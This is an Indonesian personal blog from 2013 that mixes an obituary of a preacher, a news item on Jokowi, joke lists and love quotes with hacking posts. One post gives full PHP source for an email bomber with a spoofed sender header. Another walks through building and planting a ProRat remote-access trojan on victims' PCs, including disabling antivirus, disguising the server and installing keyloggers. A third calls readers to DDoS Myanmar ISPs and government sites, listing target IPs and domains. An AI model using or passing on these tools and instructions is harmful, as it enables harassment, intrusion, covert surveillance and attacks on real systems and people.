Kamis, 25 April 2013

0 Saat Bertobat Dulu, Uje Benturkan Kepala ke Ka'bah

Kamis, April 25, 2013 Under From Refky Wijaya Nurfa
[0 Comment]
Saat Bertobat Dulu, Uje Benturkan Kepala ke Ka'bah
Ustad Jefri dan Istri (Twitter.com/@jefri_buchori)


Liputan6.com, Jakarta : Dua minggu setelah merayakan ulang tahun yang ke-40, pada 12 April 2013 lalu, Ustad Jefry Al Buchori meninggal dunia akibat kecelakaan motor di kawasan Pondok Indah.

"Inna lillaaahi wa inna ilaihi roojiuun, sesungguhnya semuanya milik Allah dan sesungguhnya semua kembali kepada Allah. Telah pulang ke Rahmatullah sahabat kita Ustad Jefry Al Buchori, yang akrab kita panggil Uje," tulis pendakwah, Arifin Ilham dalam Twitternya, Jumat (26/4/2013) dini hari. 

Uje adalah sosok ustad muda yang pintar dan gaul. Dakwahnya mengena khususnya di kalangan anak muda. 

Kemampuannya merangkul generasi muda diakuinya ada kaitannya dengan masa lalunya yang pernah gelap. Uje muda ternyata pernah terjerembab dalam jurang maksiat sebagai seorang budak narkoba. 

Dikutip dari situs www.ujecentre.com, momentum umroh bersama ibu dan kakaknya itulah yang menyadarkan pria kelahiran Jakarta itu.

Saat bertobat di Tanah Suci, Uje pernah membentur-benturkan kepalanya di Ka'bah sambil menangis. Meminta Allah mengampuni segala dosanya.

Juga, "waktu saya berada dekat makam Rasulullah, seperti ada tangan yang menarik dan melempar saya ke dinding," kata Uje suatu hari. "Nah, hal inilah yang membuat jalan untuk lebih dekat dengan Allah

Sementara, langkah Uje untuk berdakwah diawali oleh amanah dari kakak tertuanya, almarhum Ustad Abdullah Riyad untuk melanjutkan syiar di Jakarta. 

Sebab, almarhum Ustad H Abdullah Riyad mendapatkan kepercayaan dari MajlisUgame Islam Singapura (MUIS) untuk menjadi Imam besar di Masjid HajiMohammad Soleh, bersebelahan dengan Maqam Habib Nuh Al Habsyi, Palmer Road, Singapura.

Dari situlah Uje, anak ke-3 dari 5 bersaudara pasangan almarhum Ismail Modal dan Tatu Mulyana ini mulai berdakwah lewat majelis taklim, mushola, mesjid. Hingga menjadi ustad yang dikagumi.

Selain ceramah yang berbobot, Uje juga mampu melantunkan ayat Alquran dengan indah. Ternyata, saat
duduk di bangku sekolah kelas 3 hingga 5 SD, ia meraih prestasi MTQ (Musabaqah Tilawatil Qur’an) sampai tingkat provinsi Uje tamat SD.

Namun, memasuki remaja Uje dikenal mempunyai dua sisi kepribadian. Di satu sisi pada masa sekolah Uje sosok pelajar yang rajin mengikuti kegiatan kerohanian atau mengikuti pengajian. Di sisi lain Uje terbawa arus bersama teman-teman pemakai narkoba yang juga gemar dugem.

Sampai-sampai Uje juga mengikuti pengajian 'ngeboat' (menggunakan narkoba) bersama teman sekolahnya di kantin. Pada tahun 1991 Uje pernah menjadi dancer di salah satu klub. 

Setelah bertemu salah satu orang yang tak dikenal, Uje berkesempatan untuk bermain sinetron dan akhirnya mendapatkan prestasi terbaik menjadi aktor dalam sinetron Sayap Patah di TVRI.

Uje berpulang dalam kondisi baik. Meninggalkan istri bernama Pipik Dian Irawati dan empat anak bernama Adiba Khanza Az-Zahra, Mohammad Abidzar Al-Ghifari, Ayla Azuhro dan Ataya Bilal Rizqullah. 

Selamat tinggal Uje....Semoga mendapatkan tempat yang mulia di sisi-Nya. (Ein)
Read More »

Rabu, 06 Maret 2013

0 [Share] Script Email Bomber

Rabu, Maret 06, 2013 Under From Refky Wijaya Nurfa
[0 Comment]
Selamat Sore Gan ^_^ kali ini saya akan share script email bomber. Mungkin kalian semua udah pada ngerti apa yang dimaksud dengan email bomber :)

Features :
  • Bisa mengirimkan ratusan email bahkan ratusan email dalam hitungan menit
  • Tidak ribet dan simpel

Cara Pasang :
  • Pertama copy paste script berikut dalam notepad
<?php
// Email Bomber By Bengkulu Hacker Team
// Coded By Bengkulu Hacker Team
// Info and Support: http://www.bengkuluhacker.tk
$email = $_POST['to'];
$mail_message = $_POST['message'];
$senders_name = $_POST['name'];
$senders_email = $_POST['email'];
$mail_subject = $_POST['subject'];

$senders_name = preg_replace("/[^a-zA-Z0-9s]/", " ", $senders_name);
$senders_email = preg_replace("/[^a-zA-Z0-9s.@-_]/", " ", $senders_email);
$mail_message = stripslashes($mail_message);
$headers = "From: $senders_name <$senders_email>
";
$headers .= "Hallo...";
$jumlah = $_POST['jumlah'];
$i=0;
if ($_SERVER["REQUEST_METHOD"]=="POST")
{
if ($jumlah > 2)
{
$mail_subject++;
$mail_subject = $mail_subject++;
}
{
do
{
$i++;
mail($email, $mail_subject, $mail_message, $headers);
}
while ($i < $jumlah);
echo "email was sent sebanyak $jumlah!<br/>";
exit;
}

}
?>
<form action="<?=$_SERVER['PHP_SELF']?>?" method="post">
<div>Dari Nama:<br/>
<input type="text" name="name" size="40" /><br/>
Dari Email:<br/>
<input type="text" name="email" size="40" /><br/>
Kepada:<br/>
<input type="text" name="to" size="40" /><br/>
Judul:<br/>
<input type="text" name="subject" size="40" /><br/>
<br/>Message:<br/><textarea name="message" rows="20" cols="40"></textarea><br/>
<br/>Jumlah:<br/>
<input type="text" name="jumlah" size="12" /><br/>
<input type="submit" value="Kirim!" name="post" />
</div></form>


  • Setelah di copy paste simpan dalam jenis .php (Contoh : bomb.php)
  • Setelah di simpan silahkan langsung di upload di hosting kalian dan nikmatilah ^_^
NB : Jika Ada Masalah Terhadap Anda Gara-Gara Script Ini Kami Tidak Bertanggung Jawab :)
Sumber : Refky Portal
Read More »

Kamis, 21 Februari 2013

0 Malaysia Inginkan Jokowi

Kamis, Februari 21, 2013 Under From Refky Wijaya Nurfa
[0 Comment]
Jokowi Turun Ke Jalan

Aksi Gubernur DKI Jakarta Joko Widodo ternyata mengundang decak kagum negara tetangga. Sosok Jokowi yang merakyat dan mau turun langsung mendengar keluh kesah warga dinilai sebagai figur yang dibutuhkan di Malaysia.


Memang sejak menjadi gubernur, Jokowi tak henti-hentinya blusukan ke kampung-kampung kumuh. Bahkan, sebagai orang nomor satu di Jakarta, Jokowi rela masuk gorong-gorong dan menerobos banjir.

Seorang kolumnis Malaysia Syed Nadzri Syed Harun, dalam tulisan yang berjudul, Wanted badly: A Malaysian Jokowi, mengatakan, Jokowi yang baru menjabat Gubernur Jakarta akhir Oktober tahun lalu lebih menekankan kerja nyata ketimbang sibuk dengan urusan politik. Tentu tulisan itu dikaitkan menjelang Pemilu Malaysia, April nanti.

"Jokowi bahkan mau masuk ke gorong-gorong dan mengunjungi daerah kumuh serta berbicara dengan rakyat miskin tentang akses kesehatan dan pendidikan," tulis Nadzri.



Jokowi, kata dia, juga langsung turun tangan menangani banjir besar yang merendam Jakarta bulan lalu. "Dia lebih menekankan aksi nyata untuk menangani banjir," demikian tulisan Nadzri, beberapa mengutip artikel The Economist dia.

Nadzri mengaku miris dengan kondisi di Negeri Jiran saat ini di mana para elitenya lebih mementingkan urusan politik ketimbang kerja buat rakyat. Padahal, katanya, kemacetan semakin di Ibu Kota Kuala Lumpur, Johor Baru, dan Penang.

"Kita butuh Jokowi di sini. Dan seperti pernah dia katakan, dia tak ingin jadi presiden. Dia hanya menjalankan pekerjaan mulia," tuturnya.

Bahkan, Nadzri menilai tokoh oposisi di Malaysia Anwar Ibrahim sekali pun bukan lah sosok yang tepat. Dia pesimistis politikus yang sempat di bui itu akan membawa perubahan bagi Malaysia.

"Anwar sekali pun tidak akan mampu. Fokus dia sekarang adalah menang pilihan raya. Anwar dan politisi dari partai berkuasa tidak ada yang fokus kepada kepentingan rakyat. Mereka cuma sibuk dengan urusan politik," katanya.

Berarti Malaysia sedang krisis kepemimpinan? "Bukan itu maksud saya. Lebih baik lagi kalau mereka berlaku seperti Jokowi," tandasnya.
Read More »

Senin, 18 Februari 2013

0 Ciri -Ciri Hacker Dapat Dilihat Dari Fisiknya

Senin, Februari 18, 2013 Under From Refky Wijaya Nurfa
[0 Comment]

http://cirebon-cyber4rt.blogspot.com/2011/12/ternyata-ciri-ciri-hacker-dapat-dilihat.html

1. Berkacamata
mengapa seorang Hacker biasa memakai kacamata...

gimana gak pake kacamata... wong tiap hari pelototin komputer terus....

minus... minus dah tuh mata...

tambah lagi Punya kaca mata yang bisa deteksi adanya jaringan wireless (udah ngayal nih) wkwkwk

2. Kemana-mana Bawa Tangtop... upss maksudnya Laptop...
setiap saat bisa langsung online nih.

3. Berbadan Kurus
kok Hacker berbadan kurus (tergantung selera, ada juga yang gemuk gan)
gimana gak kurus, tiap disuruh makan... "ntar dulu ah lagi nanggung neh didepan komputer"
makannya ntar aja...

4. Botak
Ga botak juga sih tergantung selera hacker juga kali, mungkin yang botak kebanyakan mikir sehingga rambutnya rontok semua.

5. Jarang Mandi
gimana gak jarang mandi....
disuruh mandi, ntar dulu ah lagi nanggung, dikit lagi bisa dijebol nech...
Jebol apa...??? gak tau dah...

6. Pake Celana Jeans sama Jaket Item
Tiap kalo jalan pasti pake celana Jeans ama Jaket item...
Ini Hacker apa Copet yach...???

7. Sering menghayal
Biasanya sih... Hacker sering menghayal.
gak tau ngehayal apa.... mungkin menghayal gimana bisa menembus komputer orang kale...

8. Sering Diem
Nah ini mungkin diem, karena dia menghayal tadi kayaknya....

9. Jarang tidur (begadangan)
kutak katik di depan kompie ampe pagi and pagi lagi...

10. Jarinya keriting
lho..kok jarinya bukan rambutnya...(kebanyakkan neken keybord)

11. Kalo kemana-mana Jakil
(jalan kaki karo sikil) kadang2 nebeng, kalo lagi ada duit naek angkot.

12. Matanya merah.
karena dari semua yang diatas tadi...1-11.

13. Tabungannya banyak
soalnya jarang makan dan jarang mandi (uang makan + uang buat beli sabun ditabung)

Source : Hacker Newbie
Read More »

Sabtu, 16 Februari 2013

4 Download ProRat & Cara Hacking Menggunakan ProRat

Sabtu, Februari 16, 2013 Under From Refky Wijaya Nurfa
[4 Comment]


Kali ini saya akan share tentang salah satu software hacking, ‘’ProRat’’. ProRat adalah salah satu tool/software hacking yang mempunyai fitur yang lumayan lengkap, software ini adalah karya seseorang berkebangsaan Turkey yang memiliki fungsi untuk menyusup kekomputer orang lain. Software ini bias dibilang sangat istimewa karena fiturnya yang lengkap ditambah dengan cara pengoperasiannya yang cukup mudah.

Baiklah penjelasannya cukup sampai disini, berikut tutorialnya:

Download ProRat : Click Here !!

Cara install ProRat:
1.  Pastikan tidak ada anti virus sedang aktif di PC kita karena prorat akan terdeteksi sebagai virus, padahal ProRat sama sekali tidak mengandung virus apapun yang  akan menyebabkan kerusakan pada PC kita
2. Ekstrak ProRat yang masih berupa Zip
3. Instal dan jalankan ProRat

Langkah-langkah menggunakan ProRat
1. Siapkan IP dan port komputer korban yang terbuka, bisa juga dengan bantuan software port scanner
2. Isikan IP dan Port korban di form IP yang terdapat di ProRat


3. Buat server untuk menginveksi PC korban dengan cara: create-create prorate server lalu akan muncul tampilan Create Server

4. Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address dengan IP kamu.

5. Klik  tab General Setting, isikan Server Port (default 5110), Server
Password dan Victim Name.
6. Klik tab bind with file, bind server with a file, select file (pilih file anti virus agar tidak dicurigai) lalu klik create server
7. Klik tab Server extensions , centang EXE
8. Klik tab server icon, pilih icon yang kamu suka, lalu klik create server

9. Jalankan server tersebut di PC korban, terserah dengan cara apa saja memakai teknik social engineering, disusupkan langsung ke PC korban, atau dengan cara kamu sendiri. Kalau buat belajar, lebih simple disusupkan langsung ke salah satu computer di warnet terdekat, dan berarti korban ProRatnya adalah komputer warnet yang kamu infeksikan server tersebut

10. Setelah server berjalan di PC korban, kita bisa langsung mengkoneksikannya dengan PC kita, Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on. Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected


11. Setelah PC kita dan PC korban tersambung maka saatnya kita bermain ;)
Permainannya mudah, kamu hanya tinggal memilih menu dari ProRat untu mengacaukan PC korban, seperti mengirimkan pesan error (message), mematikan PC korban (Shut Down PC), menjalankan program di PC korban (Run), menginstal KeyLogger, dan masih banyak lagi.

Seru bukan?? Selamat mencoba,,, tapi ada baiknya kalau ini hanya digunakan untuk ajang menambah ilmu, bukan untuk merugikan orang lain. J
Read More »

0 Dork Havij Lengkap

Sabtu, Februari 16, 2013 Under From Refky Wijaya Nurfa
[0 Comment]
Sudah Beberapa Hari Ga Posting Nih Sob, Kali Ini Saya Akan Membuat Postingan Tentang "Dork Havij Lengkap" Kegunaan Dork Hajiv Ini Adalah Untuk Mencari Situs Yang Vuln Terhadap Havij. Langsung Saja Ambil Di Bawah Ini





Password :  refkywijaya
Read More »

Minggu, 10 Februari 2013

4 Pembahasan Tentang #OP MYANMAR

Minggu, Februari 10, 2013 Under From Refky Wijaya Nurfa
[4 Comment]
assalamu alaikum wr.wb

Dengan segala Hormat..!

and mewakili Burung Garuda .

w mau ngajak teman² HN untuk perang dengan Myanmar ..

domain : .mm .com .org .net .info ( berhubungan dengan Myanmar )

maaf bang admin Staff HN..!!
saya tidak suka mereka merendahkan negara kita .!!
tidak bermaksud memanas manasin ..
tapi ini menyangkut harga diri Negara kita !!!

Yang Mau Ddos :
fokus attack ISP myanmar yang menjadi target kita ini, semalam sudah DOWN tapi siang ini kembali UP, untuk itu kerahkan bandwith2 anda untuk attack target. 1 ISP berisi ratusan site, jadi kita sekali attack akan menghancurkan ratusan site myanmar. mari fokus attack dan semangat.

Target saat ini :
Target IP => 203.81.162.13
Port => 25

Target IP => http://203.81.64.23/
Port => 53

SPOILER: HIDE
Quote:
http://www.president-office.gov.mm/
http://www.dmh.gov.mm/
http://www.myancoop.gov.mm/
http://www.energy.gov.mm/
http://www.gmismofa.gov.mm/
http://www.hotel-tourism.gov.mm/
http://www.industry2.gov.mm/
http://www.irdmyanmar.gov.mm/
http://www.irrigation.gov.mm/
http://www.iwt.gov.mm/
http://www.mcit.gov.mm/
http://www.mcpt.gov.mm/
http://www.mip.gov.mm/
http://www.mnped.gov.mm/
http://www.moai.gov.mm/
http://www.moc.gov.mm/
http://www.mofa.gov.mm/
http://www.mol.gov.mm/
http://www.mora.gov.mm/
http://www.most.gov.mm/
http://www.mpce-moai.gov.mm/
http://www.livestock-fisheries.gov.mm/
http://www.pomail.gov.mm/
http://www.ssbmyanmar.gov.mm/

http://www.yatanarponteleport.net.mm/
http://www.ns4.nic.net.mm/
http://www.dems.net.mm/
http://www.etelegram.net.mm/
http://www.hantharwaddy.net.mm/
http://www.khitlunge.net.mm/
http://www.mpt.net.mm/
http://www.mptmail.net.mm/
http://www.mptngw.net.mm/
http://www.mrtv3.net.mm/
http://www.mrtv4.net.mm/
http://www.myanmar.net.mm/
http://www.nic.net.mm/
http://www.npt.net.mm/
http://www.wpiteam.net.mm/

http://www.ucsy.edu.mm/
http://www.elearning.edu.mm/

http://www.elibrary.com.mm/
http://www.imis.com.mm/
http://www.khitlunge.com.mm/
http://www.mcc.com.mm/
http://www.cbbank.com.mm/
http://www.mptmail.com.mm/
http://www.mptsat.com.mm/
http://www.myanmarinfotech.com.mm/
http://www.myanmarnlp.org.mm/
http://www.myanmarteldir.com.mm/
http://www.people.com.mm/
http://www.rubyland.com.mm/
http://www.tawwincentre.com.mm/
http://www.wbts.com.mm/
http://www.yangoncity.com.mm/

http://www.usda.org.mm/
http://www.usdp.org.mm/
http://www.khitlunge.org.mm/
http://www.mahasi.org.mm/
http://www.mmcert.org.mm/
http://www.mcpa.org.mm/

MYANMAR :
UPDATE 5-2-2013 Pukul 11:38

http://siregar.web.id/
http://indomoney.net/FuckIndo.html

UPDATE

UPDATE

UPDATE 16:43 5-2-2013
SPOILER: HIDE
Quote:
http://ghiaforqueensland.com/
http://andis-video.com/index.php
http://dekranasda-anambaskab.com/
http://maxtel.co.id/
http://www.smp17tegal.sch.id/
http://www.pohon.web.id/
http://campuraduk.info/
http://alirsyadsatya.sch.id/
http://jesseaddicted.web.id/
http://www.walhi-jogja.or.id/
http://berita.walhi-jogja.or.id/
http://donasi.walhi-jogja.or.id/
http://donasi.walhi-jogja.or.id/
http://sepedatua.web.id/
http://www.alfarizisalman.web.id/
http://mde.co.id/
dan masih banyak lagi . bahkan sub domain .go.id

INDONESIAN !!
SPOILER: HIDE
Quote:
http://forum.myanmarfrangipanitours.com/
http://madb.moai.gov.mm/
http://myanmarkingqueen.com/
http://targetmyanmaragrochem.com/
http://myanmarsme.com/
http://allmyanmarinvestment.com/
http://globalsongroup.com/
http://gmrockentgroup.com/
http://marychapman-mm.org/
http://asianskytravels.com/
http://myanmarbizdirectory.com/
http://myanmarfishexporter.com/
http://myanmartravelguides.com/
http://royalgoldentortoise.com/
http://talentsnmodels.com/
http://tinaungzawtrading.com/
http://tinmoelwin.com/
http://webasaservice.com/

MUNGKIN LEBIH BAGUSNYA KITA NGUMPUL AJA DI IRC HN .
irc.hacker-newbie.org #HN-community ..!!!

wassalam..
./ENno

Sumber

Maka Dari Itu Saya Sebagai Ketua Bengkulu Hacker Team mengajak teman-teman hacker untuk gabung di acara ini dan mengumpulkan semua komunitas hacking nya, Bengkulu Hacker Team Sudah Terdaftar Dalam Penyerangan Ini. Di Antaranya Adalah : BHT,HN,JDT,Black hat,white hat
Read More »

0 Kumpulan Kata Kata Galau

Minggu, Februari 10, 2013 Under From Refky Wijaya Nurfa
[0 Comment]
Aku bukan pasta gigi, yang cuma kamu pake ngebersihin kotoran di hati kamu trus diludahin lagi begitu aja.

Aku bukan Melinda yang bisa menerima cintamu hanya dalam satu malam.

Aku bukan Bagindas yang akan bertahan satu cinta jika terus kamu khianati.

Aku bukan handuk buat ngelap keringet. Begitu udah seger, tangan orang lain yang ngusap wajah kamu.

Hati aku bukan sepatu baru anak SD. Tolong jangan diinjek-injek.

Aku bukan Abdul & The Coffee Theory yang 1-2 minggu, 2-3 bulan sampe 4-5 tahun masih aja nungguin kamu.

Aku bukan Wolverine atau Claire Bennet, yang tiap kau lukai bisa dengan cepat menyembuhkan diri.

Aku bukan Dewi Purwati, yang tiap kamu kasih gopek lagi, gopek lagi langsung luluh dan mau diapain aja.

Aku bukan IDP yang dicuekin kamu, mau. Dibohongin juga, mau. Dan bisa kamu hipnotis semaunya.

Aku bukan Kristina yang rela jatuh bangun terus cuma demi kamu.

Aku bukan sebatang korek api yang bisa kau bakar demi menghangatkanmu untuk bersama orang lain.

Aku bukan keypad yang bisa begitu aja kamu singkirkan pas udah asyik sama touch screen.

Aku bukan Audy; buat ketemu kamu gak bakal cukup cuma satu jam.

Aku bukan pasta gigi, yang cuma kamu pake ngebersihin kotoran di hati kamu trus diludahin lagi begitu aja.

Aku bukan cita-cita kamu yang bisa digantungin setinggi langit.

Aku bukan plastik bulet2 kecil pembungkus elektronik, jangan kamu pletek-pletekin.

Aku bukan hanya siap mencintaimu. Aku juga siap untuk disakiti lagi.

Bukan seberapa banyak dia bilang aku sayang kamu, tapi seberapa sering dia mengakui ke orang lain gue sayang sama dia.

Karanganyar-Kuningan. Aku maunya jadi pacar bukan jadi cadangan.

Aku ingin jatuh cinta yang tepat, bukan jatuh cinta yang cepat.

Aku mau kita putus. KOMA!! | Lho kok koma? Bukan titik? | Iya kan sapa tau ntar balikan lagi.

Meski aku diam, bukan berarti aku rela kamu sama dia.

Jika dia jodohku, dekatkanlah. Jika bukan, aku berani perang tarif dengan jodohnya! #MentalProvider

SELINGKUH IDEALIS. Yang, aku mau selingkuh. Tapi nggak mau kalo bukan sama temen kamu. | Yaudah, aku juga, tapi harus sama papa kamu..

Dan aku mencintaimu karna hatiku telah memilihmu. Entah alasan apa aku tak mengerti, yang jelas aku sangat mencintaimu.

aku pengen nulis aku kangen kamu di batu bata terus aku lemparin ke muka kamu, biar kamu tau gmanaaa rasaanya kangeen kamu.

untuk saat ini aku harus menutupi semuanya. karna aku tdk yakin, jika aku jujur apa kamu masih tetap disini bersamaku?

Aku ingin kembali ke masa dimana selalu ada permen dan balon di sampingku. Dimana aku belum mengenak cinta serta kepedihannya.

setiap aku paksakan bibir ini tersenyum, hatiku semakin perih dan sakit.

Aku minta maaf sama kamu selama ini. Aku memang bukan yang terbaik untuk kamu … Aku memang bukan yang terbaik untuk kamu :’

Aku tau kamu bukan manusia yang sempurna, sebaliknya aku juga. Nah disitulah aku dan kamu di pertemukan, untuk saling melengkapi

Aku senyum bukan berarti hatiku ga nangis lho.. :’(

Sekarang, waktunya aku pergi dari hatimu :

Aku marah sama kamu bukan brarti aku galak ,tapi aku menegur kesalahan kamu dan ingin kamu berubah lebih baik

Jujur aku uda capek d curigain sama kamu ,skrg tinggal mau kamu gimana ,drpd kita brantem ,ambil solusi tengahnya.

Aku teringat akan mantan kekasihku ,di balik kekecewaan yang aku dapat ,di situ aku sadar bahwa jika tidak ada kekecewaan aku tdk akan sadar.

Dlu aku ragu untuk berlalu dari sisimu.. kini aku tau….. Cintamu bukan untuk ku

Aku cuma pengen kamu yang ada disamping aku bkn org lain!aku tau diluar sana byk yang lbh sempurna tapi yang aku butuhin cuma kamu yang ada di sampingku.

Mau berharap banyak sama kamu ,aku takut kecewa ,jadi tolong jangan buat aku berharap tinggi ?an kamu jatuhkan harapanku begitu saja. :’(

Aku d sini tersenyum buat kamu ,agar spy kamu tau kalo aku berusaha tegar tapi sbenarnya hati kecilku Rapuh !

Suatu saat kalau aku telah tiada ,aku pengen kamu tahu sesuatu ,kalau sampai kapanpun di hati aku cuma kamu.

Seneng Adalah Kamu samaS aku dan bilang Miss you

Hey liat aku disini!! Jangan liat cewe lo mulu!! Gue disini nungguin lo!!!

kamu hanya berikan aku kesempatan untuk mengenalmu,bukan untuk memilikimu

Kau harus tau aku disini selalu menanti kehadiran mu

Tolong aku pusing dengan sikapmu, aku berjuaang buat UN ku dan aku harap kamu bisa support aku.

Aku banyak belajar dari setiap ksalahanku ,di situ aku sadar bahwa tdk selamanya apa yang aku ingin bisa ku gapai termasuk memiliki kamu.

Dan aku rela disakiti kamu karna aku terlalu mencintai kamu.

Aku tidak pernah ingin dikasihani olehmu. Bagiku kamu adalah org yang hrs melihat aku tegar, sabar dan ikhlas.

Aku nangis. Lagi-lagi aku nangis karna inget kamu yang sekarang udah gatau lagi keberadaannya :’(

Aku sayang kamu. Salah ya?

Tapi bukan berarti cintamu ke aku turun juga, kan?

apakah aku harus menyerah sebelum berusaha?

Tuhan kirimkanlah aku kekasih yang baik hati #lagugalau

Dan aku rindu masa-masa dimana kau peluk dan kau genggam tanganku.. :’

Aku hanya sedih setiap kali mengingat masalalu yang sebenarnya indah namun terlanjur kusam karna ulahmu

Ga ada alesan lebih rinci kenapa aku cinta kamu. Alesannya ya cuma karna aku mencintai kamu baik fisik, hati, kelebihan dan kekurangan.

Kenapa mesti kamu yang ada di hati aku? Kamu ga capek buat aku sakit?

Dan rasa sakit ini tidak bisa aku tutupi hanya dengan senyuman.

kamu tau seberapa sering aku berfikir positif tentang kamu jika tdk memberi kabar kpdku? tapi ternyata semua yang kuhinda

Kamu senang, aku pun senang. Kamu sedih, aku ikut sedih. Tapi. Beda lg ya ceritanya kl kamu sedih pas putus sama dia. :’)

Engkau dan aku tercipta untuk jadi satu. Engkau dan aku, ku kan selalu jadi milikamuu~

Aku tak tau apa yang terjadi antara aku dan kau, yang ku tau pasti ku benci tuk mencintaimu~

Izinkan aku memilikimu mengasihimu menjagamu menyayangimu memberi cinta memberi semua yang engkau inginkan~

Seandainya kau tau aku kan selalu cinta~

Sesungguhnya aku sangat membutuhkan kamu. Seandainya kamu mengerti, seandainya.

Aku mohon kepadamu, kembalilah kepadaku. Karna takkan pernah ada yang mampu menggantikanmu~

Aku menunggumu dan terus menunggumu sampai kau mau~

Kini aku berharap waktu membawamu dan kekasihmu merasa jenuh dengan waktu dan berpisah lalu kau datang padaku saatku masih hanya utkamuu #lagugalau

Aku takut kamu pergi kamu hilang kamu sakit, aku ingin kau disini disampingku selamanya~

Selang waktu berganti aku tak tau kau dimana tapi aku mencoba untuk setia..

Tak pernah aku menyangka sedalam ini aku terluka

Semoga dia sayang sama aku seperti aku sayang sama dia yawloh amiiin ? #galaugila.

Dia jauh aku cemas tapi hati rindu. dia dekat aku senang tapi salah tingkah~

Aku suka kamu tapi kamu udah ada yang punya. Cinta ku mandek di sumur deh ._.

Dan aku masih tetap menunggu seperti apa akhir semua kisah penantian ku~

Dia putusin aku alesannya mau single, taunya udh sayang2an sama cewek lain!!!

Aku hanya butuh sedikit berpaling bukan ada yang lain bukan pula jenuh~

Kamu tau gak? Aku sayang banget sama kamu’ hmm bisa gak lo buktiin? Jangan sekedar omongan. Ngomong doang sih gampang. #faktagalau.

Andaikan saja aku tahu, kau tak hadirkan cintamu.Inginku melepasamau dengan pelukan~

Jangan berakhir, aku tak ingin berakhir. Satu jam saja, ku ingin diam berdua mengenang yang pernah ada~

Saat aku dan kamu sudah menjadi kita, kenapa harus ada dia dan mereka?

Dear #xoulmate .. Aku berusaha merangkai namamu di tengah rintik hujan yang malu-malu, apakah ini sia-sia?

DRAFT: Kamu pilih aku atau dia? | SENT: Aku mundur.

Aku membencimu dengan sepenuh hati. Tapi sepenuh hatiku juga membenci aku yang membencimu.

Dear simpenan, status aku mungkin sekarang buat dia, tapi hati aku udah jadi milik kamu kok.

Aku mencintai dari jauh agar hati tak terlalu sakit saat kau menjauh

Aku akan sabar menantimu, meski kau tak pernah tau… aku menantimu.

Maaf, aku mencintai kamu. Tapi aku merindukan dia.

Kamu mau putus sama aku ya? Boleh nggak hati kamu aku fotokopi rangkap sepuluh dulu buat persediaan?

Mungkin aku bisa bertahan sebagai simpananmu, tapi suatu saat hatiku juga akan mempertimbangkan apakah kau memang pantas.

Aku kangen kamu.. | Aku lebih kangen kamu. | Kangenan aku tauk! | Kangenan akuuu!! | AKUU!! | AKUU AKUUUU!! .. #jadinyaberantem.

Aku merindukanmu tanpa niatan. Aku mencintaimu tanpa rencana.

Maap ya aku numpang kangen sama kamu. Nggak lama-lama kok, kalo bisa sih tiap hari tapi kalo gak boleh ya udah malam ini aja.

Pacaran: Aku sama kamu di sini. | LDR: Aku di sini, kamu di sana. | Jomblo: Aku di sini, KAMU DI MANA??

Takengon-Bukittinggi. Aku mau move on, kenapa kamu muncul di mimpiku lagi?

Aku adalah selembar surat cinta, yang tak pernah sempat sekalipun kau buka dan kau baca

Cisarua-Bekasi. Suka aku atau enggak si?

Uluwatu – Juanda. Aku sayang kamu, kamu sayang dia.

Aku tak ingin memilikimu, supaya aku tak bisa kehilanganmu.

Satu titik, dua koma. Aku tak berkutik, melihat kau bersamanya.

Aku bukan keypad yang bisa begitu aja kamu singkirkan pas udah asyik sama touch screen.

Aku akan sabar menantimu, meski kau malah menanti dirinya.

Aku mau kita balikan. | Do I know you?

Takkan lari aku kau kejar. Tapi kenapa kau tak kunjung mengejarku?

Aku bukan sebatang korek api yang bisa kau bakar demi menghangatkanmu untuk bersama orang lain

Satu titik dua koma, aku tergelitik saat kau memilihnya.

Satu titik, dua koma. Aku pengen balik, tapi kamu masih sama dia.

Tingkat kangen aku ke kamu berbanding terbalik dengan tingkat kesadaran kamu terhadap kehadiranku.

Aku orangnya sopan. Mau nyelip di antara kamu dan kenanganmu sama dia aja pake permisi dulu..

Aku bukan pasta gigi, yang cuma kamu pake ngebersihin kotoran di hati kamu trus diludahin lagi begitu aja.


Jika sekali saja aku bisa menjadi hujan, akan kujatuhi tubuhmu dengan deras pelukan. 
Read More »